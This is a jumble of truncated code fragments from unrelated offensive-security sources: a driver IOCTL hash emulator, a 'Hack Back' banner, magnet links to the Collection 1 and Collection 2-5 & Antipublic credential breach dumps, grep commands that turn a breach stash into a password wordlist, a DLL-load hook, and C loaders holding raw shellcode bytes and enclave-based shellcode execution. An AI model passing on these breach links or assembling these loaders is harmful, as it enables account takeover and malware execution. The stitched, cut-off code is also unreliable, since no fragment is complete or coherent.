```python
#!/usr/bin/env python3
"""
handshake_hash.py
=================
Emulate the Htsysm49BE01 driver's RE_handshake_hash_v[0..3] in user-mode
via Unicorn so a client can compute the expected verify hash for IOCTL
0xAA023828 without any kernel-mode hooks, breakpoints, or driver patching.
Why this works (and why the driver author thought it wouldn't):
```
```
 _   _            _      ____             _    _ 
| | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
| |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
|  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
                   A DIY Guide
```
| # Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc | |
| # These links are already available all over the internet | |
| # Also Note, Trying to login into someone else's account without their permission is unethical and illegal | |
| # Collection 1 | |
| magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce | |
| # Collection 2-5 & Antipublic | |
| magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce |
```
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
```
```c
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#define dwAllowDllCount 1
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
    "W:\\allowed.dll"
};
VOID HookLoadDll(LPVOID lpAddr);
```
```python
# This IDAPython code can be used to disassemble an instruction
import ida_ua
import idaapi

instruction = ida_ua.insn_t()
idaapi.decode_insn(instruction, address)
disassembly = f"{hex(instruction.ea)} {instruction.get_canon_mnem()} "
for i, op in enumerate(instruction.ops):
    if op.type == ida_ua.o_void:
        continue
    if i > 0:
        disassembly += ", "
    if op.type == ida_ua.o_reg:
```
```csharp
using System;
using System.Runtime.InteropServices;
namespace ExecutableHeapInfo
{
    class Program
    {
        // Import GetProcessExecutableHeap from mscoreei.dll
        [DllImport("mscoreei.dll", SetLastError = true)]
        private static extern IntPtr GetProcessExecutableHeap();
```
```c
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
    0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
```
```python
import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary
```
```c
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
    _In_ PENCLAVE_ROUTINE Routine,
```